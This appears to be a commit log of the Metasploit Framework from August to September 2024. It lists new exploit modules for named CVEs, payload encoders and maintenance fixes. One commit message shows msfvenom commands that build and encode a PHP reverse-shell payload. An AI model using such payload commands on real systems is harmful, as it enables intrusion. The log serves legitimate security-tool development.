2024-09-12 10:36:17 -05:00
dledda-r7
41a354372c
Land #19449 , Fix an exception when the target is not Ubuntu
2024-09-12 11:10:41 -04:00
h4x-x0r
05f591d005
Cleanup and check method added
...
Cleanup and check method added
2024-09-12 15:43:20 +01:00
Jack Heysel
38a3e7696d
Responded to comments
2024-09-12 07:36:16 -07:00
Spencer McIntyre
8a812c25a1
Update the docs to highlight DNS handling
2024-09-12 10:16:00 -04:00
jvoisin
6530720605
Minor improvements of lib/msf/core/payload/php.rb
...
- Golf a condition
- Use the `shuffle` method instead of the weird `.sort_by` construct
2024-09-12 15:50:14 +02:00
h4x-x0r
30e6af7791
cleanup
...
Code cleanup and better handling of different use cases.
2024-09-12 14:34:45 +01:00
Metasploit
1a1c21a0b1
Bump version of framework to 6.4.27
2024-09-12 03:35:27 -05:00
Jack Heysel
c11ef15897
Removed unnecessary log lines
2024-09-11 23:49:18 -07:00
Jack Heysel
41cf622f38
Minor docs fix
2024-09-11 23:46:13 -07:00
Jack Heysel
c80a03fece
WP LiteSpeed exploit CVE-2024-44000
2024-09-11 23:31:26 -07:00
Chocapikk
17838e66cd
Add VICIdial Authenticated RCE module (CVE-2024-8504)
2024-09-12 01:37:44 +02:00
Jack Heysel
dd5dd54af1
beta commit module working
2024-09-11 15:23:46 -07:00
Chocapikk
644b15e421
Add header
2024-09-11 21:31:52 +02:00
Chocapikk
550a376210
Add suggestions + documentation
2024-09-11 21:17:44 +02:00
Metasploit
1b6ac0d39e
automatic module_metadata_base.json update
2024-09-11 11:34:27 -05:00
Christophe De La Fuente
da99503bd4
Land #19455 , Minor fix for SPIP BigUp Unauthenticated RCE
2024-09-11 18:18:16 +02:00
dledda-r7
5e2bf5aaca
fix(modules): spip_bigup_unauth_rce minor fix
2024-09-11 11:46:52 -04:00
Metasploit
3b7b704e45
automatic module_metadata_base.json update
2024-09-11 09:58:11 -05:00
dledda-r7
62e852176d
Land #19444 , SPIP BigUp Plugin Unauthenticated RCE
2024-09-11 10:29:12 -04:00
Metasploit
ebba72a51b
automatic module_metadata_base.json update
2024-09-11 09:19:17 -05:00
dwelch-r7
9de9b525d9
Land #19432 , Refactoring SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin
2024-09-11 14:57:48 +01:00
Chocapikk
4140808c68
Add VICIdial Time-based SQL Injection Module for Admin Credential Enumeration
2024-09-11 02:25:31 +02:00
Spencer McIntyre
f16f1aae2b
Finish the ngrok documentation
2024-09-10 16:57:37 -04:00
Spencer McIntyre
4f8d91c337
Add the initial ngrok docs
2024-09-10 16:06:03 -04:00
jvoisin
8f61e957a8
Improve modules/nops/php/generic.rb
...
```irb
irb(main):001> length = 10
=> 10
irb(main):002> Array.new(length) { ["\t", " ", "\n", "\r"].sample }.join
=> " \r\t\n\t\t\n\t\r"
irb(main):003>
```
2024-09-10 21:28:43 +02:00
Spencer McIntyre
5e71490b66
Fix a typo when the kernel is not Ubuntu
2024-09-09 14:19:20 -04:00
Spencer McIntyre
85f344a2d1
Land #19410 , Add clang support
...
Add clang support for live_compile?/upload_and_compile?
2024-09-09 13:53:47 -04:00
Spencer McIntyre
87ccb97d79
Remove an extra end statement
2024-09-09 13:07:48 -04:00
Christophe De La Fuente
1b4362b6d5
Set default server_name in #send_request_tgt_pkinit
2024-09-09 18:03:15 +02:00
Takah1ro
6b64640f8b
Update doc
2024-09-09 21:22:07 +09:00
jvoisin
4b79889052
Add clang support for live_compile?/upload_and_compile?
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-09-09 13:26:24 +02:00
Takah1ro
b8f1bc3da2
Update doc
2024-09-09 08:40:08 +09:00
Takah1ro
dd932844b6
Remove unused variables
2024-09-09 08:15:08 +09:00
Chocapikk
af5c7ecc8f
Fix bug
2024-09-08 07:54:11 +02:00
Chocapikk
4f859f129c
Fix bug
2024-09-08 07:52:40 +02:00
Chocapikk
c75ffb4d43
Update documentation
2024-09-08 07:19:35 +02:00
Chocapikk
59faa1bf0c
Change version fingerprinting
2024-09-08 07:01:23 +02:00
Chocapikk
43fabb07e5
Update doc + module + (mixin see #19444 )
2024-09-08 06:56:13 +02:00
Chocapikk
f8675026ec
Update documentation again
2024-09-08 06:32:05 +02:00
Chocapikk
3dfdaea695
(re)fix spip mixin
2024-09-08 06:18:17 +02:00
Chocapikk
9907f94ffc
.
2024-09-08 06:05:48 +02:00
Chocapikk
289f47fac1
Update documentation with docker setup, working mixin now, update module
2024-09-08 05:59:11 +02:00
Takah1ro
8ddf8a04ff
Remove options
2024-09-07 12:44:37 +09:00
Takah1ro
212c96d195
Add last blank line
2024-09-07 12:29:32 +09:00
Takah1ro
8366252ba2
Not call payload directory
2024-09-07 12:28:40 +09:00
Takah1ro
692531bb87
Call payload directory
2024-09-07 12:16:04 +09:00
Chocapikk
cc6127897f
Add suggestions
2024-09-07 04:00:25 +02:00
Takah1ro
2b63f8bb88
Rename exploit
2024-09-07 10:29:41 +09:00
Takah1ro
731780ca1a
Formatting
2024-09-07 09:21:30 +09:00
Takah1ro
9e832eb483
Use exploit_path variable
2024-09-07 09:19:17 +09:00
Valentin Lobstein
0b768791d6
Update modules/exploits/multi/http/spip_bigup_unauth_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-07 01:56:21 +02:00
Valentin Lobstein
484cdc940f
Update modules/exploits/multi/http/spip_bigup_unauth_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-07 01:56:09 +02:00
Valentin Lobstein
c90f9b1ae5
Update modules/exploits/multi/http/spip_bigup_unauth_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-07 01:55:54 +02:00
Valentin Lobstein
48f8e248a6
Update documentation/modules/exploit/multi/http/spip_bigup_unauth_rce.md
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-07 01:49:57 +02:00
Chocapikk
92a25e5a29
Add source (oopsie)
2024-09-07 03:11:49 +02:00
Chocapikk
8b1e1dab1b
Add some comments and CVE ID
2024-09-07 03:09:42 +02:00
Chocapikk
fdc28080c9
Update disclosure date
2024-09-06 22:14:27 +02:00
Chocapikk
8608e7021d
Add spip_bigup_unauth_rce module
2024-09-06 22:10:18 +02:00
Takah1ro
fd7321dd3f
Strip_comments
2024-09-06 22:58:31 +09:00
Takah1ro
72a9164024
Update pre-compiled binary
2024-09-06 22:29:09 +09:00
Takah1ro
b34e807277
Remove unnecessary directory existing check
2024-09-06 22:05:34 +09:00
Takah1ro
a40fbb2a7b
Remove unnecessary check
2024-09-06 22:04:51 +09:00
Takah1ro
d4ac300d73
Fix typo
2024-09-06 21:59:16 +09:00
jvoisin
ec8d2f8cc1
Remove an old comment in lib/msf/core/payload/php.rb
...
The encoder has been implemented in modules/encoders/php/minify.rb
2024-09-06 14:48:45 +02:00
Takahiro Yokoyama
ccc4727dfd
Update external/source/exploits/CVE-2023-0386/exploit.c
...
Avoid recursively delete files indiscriminate.
Co-authored-by: bcoles <bcoles@gmail.com >
2024-09-06 21:48:29 +09:00
Takahiro Yokoyama
7a921bbeff
Update modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
...
Use kernel_version.btween
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-09-06 21:45:32 +09:00
Takah1ro
cd97b08c62
Move C code to separate file
2024-09-06 21:09:39 +09:00
cgranleese-r7
8e94a0d805
Land #19352 , add necessary metadata for bruteforce
...
add necessary metadata for bruteforce
2024-09-06 10:18:21 +01:00
cgranleese-r7
e377e746e9
Update lib/metasploit/framework/login_scanner/ldap.rb
2024-09-06 10:10:09 +01:00
Takah1ro
1cc562c863
Use mkdir function
2024-09-06 12:55:51 +09:00
Takah1ro
920ef70105
Exploit dir existing check
2024-09-06 12:53:18 +09:00
Takahiro Yokoyama
b243b86157
Update modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
...
use linux/x64/meterpreter_reverse_tcp
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-09-06 08:51:20 +09:00
Takah1ro
dc81711301
Make timeout user configurable
2024-09-06 08:24:14 +09:00
Metasploit
fa8c80f430
automatic module_metadata_base.json update
2024-09-05 13:17:29 -05:00
Jack Heysel
93ddceb929
Land #19419 , Remove unneeded code in php/base64
...
This remove some useless code in modules/encoders/php/base64.rb
2024-09-05 11:00:56 -07:00
Metasploit
1ffb0b16cb
automatic module_metadata_base.json update
2024-09-05 11:57:37 -05:00
Jack Heysel
9fad484029
Land #19439 , Update bypassuac_comhijack supported arch
...
This explicitly defines x86 and x64 as supported architectures for the
bypassuac_comhijack module. Prior to this change there were no defined
architectures and if you tried to use an x64 based payload the module
would fail.
2024-09-05 09:41:41 -07:00
Metasploit
3e82156200
automatic module_metadata_base.json update
2024-09-05 11:33:13 -05:00
Jack Heysel
152710403d
Land #19330 , Add SSL opt in start_service
...
The start_service method now allows users to specify their SSL
preferences directly through the opts parameter. If the ssl option is
not provided in opts, it will default to the value in datastore["SSL"]
2024-09-05 09:08:07 -07:00
Jack Heysel
434593dcb4
Suggestion and rubocop fixes
2024-09-05 08:49:32 -07:00
Takah1ro
afb8c6c27c
Strip comments
2024-09-05 23:13:08 +09:00
Takah1ro
216590f84a
Add last blank line
2024-09-05 23:00:06 +09:00
Takah1ro
3d20dd6ddf
Add module:
...
Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386
2024-09-05 22:54:55 +09:00
Metasploit
6f1acf4610
Bump version of framework to 6.4.26
2024-09-05 03:38:07 -05:00
Metasploit
72f4dcb529
automatic module_metadata_base.json update
2024-09-04 17:13:06 -05:00
Jack Heysel
4712bb4db5
Land #19435 , Add php minify encoder
...
This encoder minifies PHP payloads by removing spaces after keywords and
before block openings. It removes comments, empty lines, new lines and
leading and trailing spaces
2024-09-04 14:47:24 -07:00
Jack Heysel
05c3c9ac65
Updated reliability comment
2024-09-04 14:09:04 -07:00
Jack Heysel
2da95ebc6a
Remove SLEEP datastore option
2024-09-04 13:39:01 -07:00
Chocapikk
37042d837e
Add spip_plugin_version function to retrieve plugin version from config.txt or Composed-By header
2024-09-04 22:17:06 +02:00
Chocapikk
b8a1d40f46
Rename execute_command to send_payload in line with its actual function (avoiding confusion with cmdstager)
2024-09-04 21:14:39 +02:00
Chocapikk
8024533ab4
More readable check functions
2024-09-04 21:09:49 +02:00
sjanusz-r7
10dee226c6
Replace Readline with Reline
2024-09-04 16:39:41 +01:00
bcoles
b1ec86ebc5
bypassuac_comhijack: Specify x86/x64 as supported payload architectures
2024-09-04 23:49:33 +10:00
Chocapikk
7458a2dba3
Remove useless documentation
2024-09-03 20:29:45 +02:00
dwelch-r7
5f65ce21c6
Land #19438 , Fixes a nil error if login is successful with ldap_login module
2024-09-03 14:54:47 +01:00
cgranleese-r7
242d91ee72
Fixes ldap_login nil error when login is successful
2024-09-03 14:00:26 +01:00
h4x-x0r
75627ccba7
Update whatsup_gold_sqli.rb
2024-09-02 15:45:45 +01:00
h4x-x0r
fdd740b235
cleanup
...
cleanup
2024-09-02 15:44:27 +01:00
h4x-x0r
64f595c431
cleanup, version check, documentation
...
cleanup, version check, documentation
2024-09-02 15:41:08 +01:00
h4x-x0r
686da13ff5
WhatsUp Gold SQL Injection (CVE-2024-6670)
...
WhatsUp Gold SQL Injection (CVE-2024-6670)
2024-09-02 16:09:10 +01:00
h4x-x0r
c82b8217a8
CVE-2024-6670
...
CVE-2024-6670
2024-09-01 23:26:11 +01:00
jvoisin
5b94c7e2d4
Add an encoder to minify php payloads
...
```console
$ ./msfvenom --platform php -a php -p php/reverse_php | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
No encoder specified, outputting raw payload
Payload size: 3010 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4052 (iteration=0)
php/base64 chosen with final size 4052
Payload size: 4052 bytes
No syntax errors detected in Standard input code
$ ./msfvenom --platform php -a php -p php/reverse_php -e php/minify | ./msfvenom -e php/base64 --platform php -a php | php -l
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/minify
php/minify succeeded with size 2109 (iteration=0)
php/minify chosen with final size 2109
Payload size: 2109 bytes
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 2839 (iteration=0)
php/base64 chosen with final size 2839
Payload size: 2839 bytes
No syntax errors detected in Standard input code
$
```
2024-09-01 23:09:47 +02:00
gardnerapp
d676bedc0f
Update modules/exploits/osx/local/persistence.rb
...
Co-authored-by: dwelch-r7 <Dean_Welch@rapid7.com >
2024-08-30 18:25:02 -04:00
Chocapikk
36621c05d9
del documentation/modules/exploit/unix/webapp/spip_rce_form.md
2024-08-30 22:22:41 +02:00
Chocapikk
28ac6f5e07
add CheckCode:Safe
2024-08-30 21:58:30 +02:00
Jack Heysel
9ad5b41064
Rubocop
2024-08-30 12:56:10 -07:00
Chocapikk
4994ebbef5
fix: right versions in spip_porte_plume_previsu.rb
2024-08-30 21:53:47 +02:00
Jack Heysel
7bfd814297
Removed memory polling
2024-08-30 12:52:18 -07:00
Chocapikk
effbfac806
fix: right versions in spip_rce_form.rb ....
2024-08-30 21:50:11 +02:00
Chocapikk
53f0bc398c
fix: correct version handling error in SPIP check
2024-08-30 21:46:35 +02:00
Chocapikk
586cf482ce
Refactoring SPIP Modules for Windows Compatibility and Incorporating SPIP Mixin
2024-08-30 20:37:32 +02:00
Metasploit
db55e5e8fd
automatic module_metadata_base.json update
2024-08-30 10:52:23 -05:00
Jack Heysel
f951f250f8
Land #19381 , Fix gitlab_login scanner
...
This fixes the gitlab_login scanner so that it uses the proper datastore
options Username and Password which are the standard for login scanners.
Before this fix the scanner was using HttpUsername and HttpPassword and
ignoring the datastore options Username and Password
2024-08-30 08:36:08 -07:00
Metasploit
b77b64069a
automatic module_metadata_base.json update
2024-08-30 07:23:35 -05:00
dwelch-r7
05cfe7c795
Land #19401 , Add a mixin to get SPIP version and make use of it
2024-08-30 13:07:02 +01:00
Dean Welch
d86e85aeea
Remove whitespace from spip version regex
2024-08-30 11:42:55 +01:00
Dean Welch
6532107eb4
Remove whitespace from spip version regex
2024-08-30 11:33:15 +01:00
Jack Heysel
b011b67f80
Responded to comments
2024-08-29 22:25:20 -07:00
Adithya Chiluka
4a0d3d4598
Update README.md
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-08-30 06:30:31 +05:30
Adithya Chiluka
a37c3bcd4b
Update README.md
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-08-30 06:30:20 +05:30
Adithya Chiluka
51bd4fd8ac
Update README.md
...
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com >
2024-08-30 06:29:59 +05:30
Jack Heysel
b32234382e
Add correct missing file
2024-08-29 18:53:39 -04:00
Metasploit
bd681f89c9
automatic module_metadata_base.json update
2024-08-29 16:33:25 -05:00
bwatters
fa734b5a56
Land #19368 , Geoserver enhancement
...
Merge branch 'land-19368' into upstream-master
2024-08-29 16:07:48 -05:00
bwatters
be4900f06d
Rebase and readd documentation/modules/exploit/linux/http/openmetadata_auth_bypass_rce.md
2024-08-29 11:25:13 -05:00
h00die-gr3y
6b640d0506
some small final changes
2024-08-29 11:23:58 -05:00
h00die-gr3y
bad1c33dd3
removed openmetadata files accidently added
2024-08-29 11:23:58 -05:00
h00die-gr3y
003769f1d7
Added POC reference
2024-08-29 11:23:58 -05:00
h00die-gr3y
1d60705516
dynamic feature type enhancement
2024-08-29 11:23:58 -05:00
h4x-x0r
64123ab599
placeholder for CVE-2024-43425
...
placeholder for CVE-2024-43425
2024-08-29 17:17:10 +01:00
Jack Heysel
e40f6cb785
Add missing file
2024-08-29 08:38:08 -04:00
h4x-x0r
a39c4076e4
cleanup
...
cleanup
2024-08-29 13:36:54 +01:00
cgranleese-r7
6b49eb381d
Land #19429 , Update framework dependencies
2024-08-29 10:52:34 +01:00
adfoster-r7
e796c6a3a1
Update framework dependencies
2024-08-29 10:27:17 +01:00
Metasploit
b9bbfa6567
Bump version of framework to 6.4.25
2024-08-29 03:34:28 -05:00
Metasploit
30dd3774d8
automatic module_metadata_base.json update
2024-08-28 18:59:07 -05:00
bwatters
6b83f09312
Land #19421 , Updates to adobe_pdf_embedded_exe
...
Merge branch 'land-19421' into upstream-master
2024-08-28 18:40:55 -05:00
bwatters
87fbba3426
Land #19405 , Minor improvements to lib/msf/core/post/linux/kernel.rb
...
Merge branch 'land-19405' into upstream-master
2024-08-28 16:55:14 -05:00
Metasploit
dd3b9317dc
automatic module_metadata_base.json update
2024-08-28 15:39:04 -05:00
Spencer McIntyre
0b0f9cdce9
Land #19409 , Add additional Linux VM fingerprints
...
Improve a bit modules/post/linux/gather/checkvm.rb
2024-08-28 16:10:54 -04:00
adfoster-r7
84ffa524e5
Land #19424 , WordPress GiveWP Plugin RCE
2024-08-28 21:09:42 +01:00
adfoster-r7
71ee987079
Add additional documentation steps, and use 0 for the payload http timeout
2024-08-28 19:21:27 +01:00
Metasploit
3bab5277bc
automatic module_metadata_base.json update
2024-08-28 13:11:08 -05:00
adfoster-r7
fabb5d1f78
Land #19422 , pgAdmin 8.4 RCE / CVE-2024-3116
2024-08-28 18:54:53 +01:00
adfoster-r7
aaf95f9134
Apply suggestions from code review
2024-08-28 18:46:08 +01:00
Chocapikk
9eb630d993
Add credit
2024-08-28 19:20:32 +02:00
Chocapikk
6bec3d2db0
Lint
2024-08-28 19:16:26 +02:00
igomeow
d0d4c3083a
Fixing error message
2024-08-28 18:33:31 +02:00
igomeow
2b7cf76fc8
Fixing wrong SideEffects and Reliability values
2024-08-28 18:20:20 +02:00
igomeow
251c1c0c1e
Adding check for host operating system
2024-08-28 18:17:36 +02:00
Metasploit
ab4bc033d6
automatic module_metadata_base.json update
2024-08-28 11:04:51 -05:00
Spencer McIntyre
2aea8b4ef7
Land #19420 , Add modules/encoders/php/hex.rb
2024-08-28 11:49:00 -04:00
jvoisin
2c79c3d02f
Add a mixin to get SPIP version and make use of it
2024-08-28 17:17:53 +02:00
Spencer McIntyre
a22db071f0
Appease rubocop
2024-08-28 10:46:48 -04:00
h4x-x0r
018b041335
cleanup
...
cleanup
2024-08-28 15:40:35 +01:00
Valentin Lobstein
2900d45e9f
Update documentation/modules/exploit/multi/http/wp_givewp_rce.md
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-08-28 13:00:32 +02:00
Valentin Lobstein
57343d3bc4
Update modules/exploits/multi/http/wp_givewp_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-08-28 13:00:20 +02:00
jvoisin
24750deab3
Add modules/encoders/php/hex.rb
...
This one increases the size of the payload by a bit more than a factor two,
but should be able to generate a valid encoded payload in some pathological
BADCHAR situations where modules/encoders/php/base64.rb can't.
2024-08-28 12:19:04 +02:00
Metasploit
370f0f4e13
automatic module_metadata_base.json update
2024-08-27 16:33:43 -05:00
bwatters
02eb49ed00
Land #19395 , Electerm post password gather module
...
Merge branch 'land-19395' into upstream-master
2024-08-27 16:17:45 -05:00
Chocapikk
06a9583cfd
Fix typo
2024-08-27 22:16:11 +02:00
Chocapikk
1d7cffbdac
Refactored exploit module based on RCESecurity's analysis of CVE-2024-5932
...
- Completely overhauled the method for exploiting the GiveWP plugin by removing dependency on the REST API, which may require authentication.
- Instead, we now use the admin-ajax.php endpoint for retrieving form lists and nonce values, ensuring compatibility even when REST API authentication is required.
- The exploit now works with all form types; however, the give_price_id and give_amount must be set to '0' and '0.00', respectively, as attempts to randomize these values caused the exploit to fail.
2024-08-27 22:15:12 +02:00
Metasploit
fd66ab72ed
automatic module_metadata_base.json update
2024-08-27 14:44:06 -05:00
Jack Heysel
8bf354cad2
Land #19417 , Improve wp_backup_migration_php exploit
...
The new PHP filter chain evaluates a POST parameter, which simplifies
the process and reduces the payload size enabling the module to send the
entire paylaod in one POST request instead of writing the payload to a
file character by character over many POST requests. Support for both
Windows and Linux Meterpreter payloads, not just PHP Meterpreter, has
also been added.
2024-08-27 15:17:00 -04:00
Chocapikk
7f37731396
Lint
2024-08-27 21:14:35 +02:00
Chocapikk
80c784f0e8
Update detail about payloads
2024-08-27 21:07:18 +02:00
Chocapikk
23cd137fbd
Update module
2024-08-27 20:28:44 +02:00
Chocapikk
d249711480
Update doc
2024-08-27 20:27:46 +02:00
jheysel-r7
61fa0c40b8
Update documentation/modules/exploit/multi/http/wp_backup_migration_php_filter.md
2024-08-27 14:14:28 -04:00
Chocapikk
bc7840ea7f
Add wp_givewp_rce exploit module
2024-08-27 19:50:35 +02:00
Metasploit
f783aab9a3
automatic module_metadata_base.json update
2024-08-27 12:06:04 -05:00
bwatters
6c24e0a952
Land #19393 , Update OFBiz ProgramExport RCE for Patch Bypass
...
Merge branch 'land-19393' into upstream-master
2024-08-27 11:48:38 -05:00
adfoster-r7
2711acf657
Land #19423 , Rename acceptance.yml in preparation for another PR
2024-08-27 16:21:37 +01:00
cgranleese-r7
f3d7abd54d
Renames acceptance.yml in preperation for another PR
2024-08-27 16:10:01 +01:00
Metasploit
fef929aafc
automatic module_metadata_base.json update
2024-08-27 10:03:07 -05:00
bwatters
4af2294709
Land #19386 , Ivanti Virtual Traffic Manager (vTM) Authentication Bypass (CVE-2024-7593) Module
...
Merge branch 'land-19386' into upstream-master
2024-08-27 09:39:10 -05:00
Jack Heysel
49d382692a
Land #19377 , Add compressinon to php/base64
...
This enables users to set a datastore option in enocoders/php/base64
which will compress the payload using zlib, greatly reducing its size
2024-08-27 10:27:45 -04:00
Simon Janusz
3ad24b45e3
Land #19241 , Remove uri unescape usage
2024-08-27 15:22:43 +01:00
cgranleese-r7
fa80ced9a7
Land #19412 , Update rexml
2024-08-27 13:12:43 +01:00
Metasploit
322b09e503
automatic module_metadata_base.json update
2024-08-26 18:45:32 -05:00
bwatters
f74b7ccef5
Land #19415 , Update the ldap_esc_vulnerable_cert_finder module
...
Merge branch 'land-19415' into upstream-master
2024-08-26 18:28:33 -05:00
Metasploit
2e0a73823e
automatic module_metadata_base.json update
2024-08-26 18:26:17 -05:00
bwatters
84431b0a4e
Land #19380 , Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
...
Merge branch 'land-19380' into upstream-master
2024-08-26 18:09:09 -05:00
igomeow
6326cac8d4
Fixing nil safe issue
2024-08-26 23:23:43 +02:00
igomeow
7e9f52dd0b
Github release
2024-08-26 23:02:53 +02:00
Spencer McIntyre
db7dc6596f
Fix rubocop complaints
2024-08-26 16:59:04 -04:00
jheysel-r7
573643a7b4
Update modules/encoders/php/base64.rb
2024-08-26 16:35:29 -04:00
Metasploit
def7f5a823
automatic module_metadata_base.json update
2024-08-26 15:34:20 -05:00
Spencer McIntyre
b61e6b1cc2
Add ARCH_X64 and test it, refactor to drop EXENAME
2024-08-26 16:25:03 -04:00
jvoisin
656c8fd4fb
Remove some useless code in modules/encoders/php/base64.rb
...
The payload is always quoted since 975de9d479 , so
there is no need to care if the first character is alpha or not.
This has some chance to make the payload 5 chars smaller, woo!
2024-08-26 22:21:27 +02:00
Jack Heysel
e0037fb167
Land #19376 , Fix php/base64 encoder
...
This fixes the php/base64 encoder which was previously generating php
payloads that were failing when being being run
2024-08-26 16:08:03 -04:00
igomeow
b3605bd951
Documentation
2024-08-26 19:59:17 +02:00
igomeow
d1ce041fd0
Inital commit and Rubocop fixes
2024-08-26 19:27:20 +02:00
Chocapikk
c32c1e3a66
Update doc
2024-08-24 17:31:09 +02:00
Chocapikk
05b1837e7b
Random parameter generation
2024-08-24 17:27:13 +02:00
Chocapikk
4ee30b24cb
Rewrite wp_backup_migration_php_filter
2024-08-24 17:16:58 +02:00
h4x-x0r
6532255600
PoC & Documentation
...
PoC & Documentation
2024-08-23 23:21:49 +01:00
Spencer McIntyre
4cfa93f878
Update the ldap_esc_vulnerable_cert_finder module
2024-08-23 16:49:30 -04:00
cgranleese-r7
e7dccc0803
Land #19408 , Disable mssql tests for now
2024-08-23 14:26:13 +01:00
Christophe De La Fuente
19e3f29441
Add missing constants for the Kerberos login scanner & set default server_name value in the client
2024-08-23 15:01:18 +02:00
adfoster-r7
82f1c2f61c
Update rexml
2024-08-23 13:17:32 +01:00
adfoster-r7
fb4fde823d
Land #19411 , Fix RPC: check result is not nil before getting length
2024-08-23 11:28:54 +01:00
Metasploit
2452fd57bb
automatic module_metadata_base.json update
2024-08-23 04:26:17 -05:00
dledda-r7
9521563e8d
fix(rpc): check result is not nil before getting length
2024-08-23 05:25:59 -04:00
dledda-r7
ec5892ff1f
Land #19363 , Ray Modules CVE-2023-6019 CVE-2023-6020 CVE-2023-48022
2024-08-23 04:55:17 -04:00
jvoisin
debb01062d
Improve a bit modules/post/linux/gather/checkvm.rb
...
Based on some old notes that I never bothered to upstream into metasploit.
2024-08-22 23:19:09 +02:00
adfoster-r7
c146d23ec1
Disable mssql tests for now
2024-08-22 22:06:59 +01:00
Jack Heysel
f6378913c3
Merge branch 'win-kernel-lpe-cve-2024-30038' of github.com:jheysel-r7/metasploit-framework into win-kernel-lpe-cve-2024-30038
2024-08-22 13:07:30 -07:00
Jack Heysel
6689614d8f
Responded to comments
2024-08-22 13:06:29 -07:00
三米前有蕉皮
ea6efff830
Update modules/post/multi/gather/electerm.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-08-22 22:28:01 +08:00
三米前有蕉皮
c37b697b99
Update documentation/modules/post/multi/gather/electerm.md
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-08-22 22:27:51 +08:00
jvoisin
f5145dee35
Minor improvements to lib/msf/core/post/linux/kernel.rb
...
1. Add a couple of missing architectures
2. Use `read_file` instead of `cmd_exec + cat`
2. Use File.… instead of `cmd_exec` and `test`
2024-08-22 11:34:22 +02:00
Metasploit
1a35492634
Bump version of framework to 6.4.24
2024-08-22 03:38:31 -05:00
jheysel-r7
bde9fca9e4
Apply suggestions from code review
2024-08-22 02:35:21 -04:00
Jack Heysel
31348dac33
Windows LPE CVE-2024-30088
2024-08-21 23:16:37 -07:00
adfoster-r7
0df07d7693
Land #19390 , Adds support to test custom payload branches
2024-08-21 17:06:21 +01:00
Metasploit
2dd06c3264
automatic module_metadata_base.json update
2024-08-21 09:03:13 -05:00
cgranleese-r7
63ac22950f
Adds support to test custom payload branches
2024-08-21 15:02:19 +01:00
dledda-r7
35da4662ed
Land #19351 , DIAEnergie SQL Injection
2024-08-21 09:44:15 -04:00
Takah1ro
39f81e0a45
Update check function
2024-08-21 22:32:53 +09:00
Metasploit
facd583630
automatic module_metadata_base.json update
2024-08-21 08:15:03 -05:00
Takah1ro
ee58313d64
Update check function
2024-08-21 22:09:56 +09:00
dwelch-r7
f3a220518a
Land #19394 , SPIP Unauthenticated RCE Exploit
2024-08-21 13:58:26 +01:00
Takahiro Yokoyama
c66540ef2f
Update modules/exploits/linux/http/ray_agent_job_rce.rb
...
use MeterpreterTryToFork to avoid a meterpreter session get killed
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-08-21 21:38:37 +09:00
Metasploit
1a732158c0
automatic module_metadata_base.json update
2024-08-21 04:50:31 -05:00
dwelch-r7
8d838d4d56
Land #19366 , Jenkins Login Scanner improvments
2024-08-21 10:28:22 +01:00
Chocapikk
62ab17b14d
Update documentation and Docker Compose for SPIP, remove Rex.sleep() in Metasploit module due to stable payload.
2024-08-20 19:41:05 +02:00
Valentin Lobstein
fdbf7dd3ef
Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-08-20 18:54:03 +02:00
Takah1ro
91167fc85f
Remove unnecessary option
2024-08-20 21:44:11 +09:00
Takah1ro
4d1782640b
Update sideeffects
2024-08-20 19:12:18 +09:00
Takah1ro
01b2a1c55c
Enable fetch payload
2024-08-20 13:20:42 +09:00
Takah1ro
45677898a8
Add TARGET_URI
2024-08-20 13:08:01 +09:00
Takah1ro
52852cea72
Add cve ref
2024-08-20 12:59:52 +09:00
h00die
c8084e4504
Create vcenter_sudo_lpe.rb
2024-08-19 20:02:05 -04:00
Takah1ro
99c81d7821
Set default fetch_command to wget
2024-08-20 08:59:39 +09:00
Takah1ro
64bdf54bb0
Use Fetch Payload (Not tested)
2024-08-20 08:56:05 +09:00
Takah1ro
a5b9d553fa
Update check to use version info
2024-08-20 08:25:27 +09:00
Takah1ro
5be7e09ff0
Update check to use version info
2024-08-20 08:21:48 +09:00
Takah1ro
17ea7d2b72
Remove explicit return
2024-08-20 08:15:16 +09:00
Takah1ro
1232080340
Update lfi module
2024-08-20 08:09:12 +09:00
Takahiro Yokoyama
f902ae84fe
Update modules/auxiliary/gather/ray_lfi_cve_2023_6020.rb
...
Avoid check method being controlled by the 'FILEPATH' content
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com >
2024-08-20 07:45:38 +09:00
h4x-x0r
e30232d2ca
CVE-2024-31214 & CVE-2024-24809
...
CVE-2024-31214 & CVE-2024-24809
2024-08-19 23:03:36 +01:00
h4x-x0r
362b2427dc
Error handling and code cleanup
...
Error handling and code cleanup
2024-08-19 22:47:19 +01:00
h4x-x0r
3f3690bebb
code cleanup
...
code cleanup
2024-08-19 21:17:16 +01:00
Chocapikk
334a9bafa9
Use encoder/php/base64
2024-08-19 18:26:19 +02:00
Chocapikk
3d00f819c6
Update
2024-08-20 07:04:30 +02:00
Chocapikk
b0f3bf1576
Add credit
2024-08-20 07:02:59 +02:00
Chocapikk
c7d20853d6
Update documentation
2024-08-19 19:51:36 +02:00
